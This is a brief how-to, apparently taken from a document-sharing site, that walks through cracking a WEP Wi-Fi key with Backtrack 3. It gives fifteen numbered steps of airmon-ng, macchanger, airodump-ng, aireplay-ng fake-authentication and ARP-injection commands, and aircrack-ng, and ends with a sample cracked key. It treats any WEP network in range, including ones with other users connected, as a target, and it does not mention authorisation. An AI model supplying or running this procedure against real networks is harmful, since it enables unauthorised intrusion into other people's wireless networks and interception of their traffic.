Вы находитесь на странице: 1из 5

This article will explain how to crack wep key using Backtrack3.

Step 1:Download Backtrack 3 from the following link http://www.remote-exploit.org/backtrack_download.html Step 2:Burn the iso image on CD and boot your laptop from CD drive Step 3:Select the third boot option(VESA/KDE). Step 4:Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Step 5:Type the following command airmon-ng

Note down the interface name. In this example wifi0 Step 6:airmon-ng stop wifi0 Step 7:ifconfig wifi0 down Step 8:macchanger --mac 00:11:22:33:44:55 wifi0

Step 9:airmon-ng start wifi0

Step 10:airodump-ng wifi0

This will start populating Wifi networks. Press Ctrl + C to stop. Check the network with WEP encryption. Notedown BSSID, CH and ESSID somewhere in notepad or paper Note that if the same BSSID is available in the second part with STATION associated with it, it means you some one is accessing that network and our task will be little easier. If not than dont worry we will still crack it Step 11:airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0 Replace (channel) with the CH which u had already note (file name) with any name of your choice (bssid) with the BSSID which u had already note

Leave this console as it is and start new console Step 12:aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wifi0

If you dont get Association Successful message than keep on trying until you get success Step 13:aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wifi0

Well if you dont see ARP ACK and sent packets are not increasing or still 0 than it means no 1 is accessing that network.But dont worry you got an optional step Leave this console as it is and start new console Step 14:aireplay-ng -2 p 0841 c FF:FF:FF:FF:FF:FF b (bssid) h 00:11:22:33:44:55 wfi0

Press y and enter Now you will see that ARP and ACK packets in 2nd console are increasing fast Keep this console as it is and start 4th console Step 15:aircrack-ng -b (bssid) (filename)-01.cap Just wait and watch..Backtrack will do rest of the work.

Hurray we got the key. Remove : so as in our screenshot the key will be 7D0005F98DC9E489F211C54998

Вам также может понравиться